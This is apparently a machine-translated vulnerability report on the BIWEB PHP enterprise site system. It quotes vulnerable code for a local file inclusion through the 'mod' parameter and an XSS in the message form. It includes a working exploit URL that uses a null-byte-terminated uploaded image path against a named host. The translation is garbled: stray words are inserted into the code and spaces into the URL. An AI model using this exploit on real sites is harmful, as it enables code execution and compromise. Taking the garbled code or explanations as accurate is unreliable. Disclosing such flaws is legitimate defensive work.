BIWEB bugs and fixes-vulnerability warning-the black bar safety net

2011-12-20T00:00:00
ID MYHACK58:62201132650
Type myhack58
Reporter 佚名
Modified 2011-12-20T00:00:00

Description

BIWEB PHP open source enterprise built Station system bug fixed version,

  1. Pass to kill the contains

/wap/detail.php, X, X...

$objWebInit = new wap(); if (empty($_GET['page'])) {

$intPage = 1 ;

} else {

$intPage = intval($_GET['page']);

}

if (empty($_GET['cpage'])) {

$intCPage = 1 ;

} else {

$intCPage = intval($_GET['cpage']);

}

if (! empty($_GET['mod'])) {

$strModuleID = strval($_GET['mod']);

the include_once('../'.$ strModuleID.'/ config/var.inc.php');

$objWebInit->setDBG($arrGPdoDB);

$objWebInit->db();

exp:

http://www.2cto.com /biwebcorp/wap/list. php? mod=uploadfile/2 0 1 1 1 2/2 0 1 1 1 2 1 8 0 2 5 6 1 5 6 4 8. jpg%0 0

2.

PHP open source enterprise built Station system bug fixes versionXSS

message\include\index.inc.php

if ($_SERVER["REQUEST_METHOD"] == "POST"){

if(empty($_POST['contact'])) check::AlertExit('sorry, the name must be filled!', -1);

if(empty($_POST['tel'])) check::AlertExit('sorry, the contact number must be filled in!', -1);

.......

$strIP = check::getip();

$_POST['user_ip'] = $strIP;

$objWebInit->saveInfo($_POST,0); saveInfo function

function saveInfo($arrData,$intModify=0){

$arr = array();

$arr = check::SqlInjection($this->saveTableFieldG($arrData));

.......

} SqlInjection function

static function SqlInjection($ParamValue,$enforce=false){

if (! get_magic_quotes_gpc() || $enforce){

if (is_array($ParamValue)){

foreach ($ParamValue as $key=>$value){

$ParamValue[$key] = addslashes($value);

}

}else{

$ParamValue = addslashes($ParamValue);

}

}

return $ParamValue;

} Portal PHP open-source build systemxss a big lump..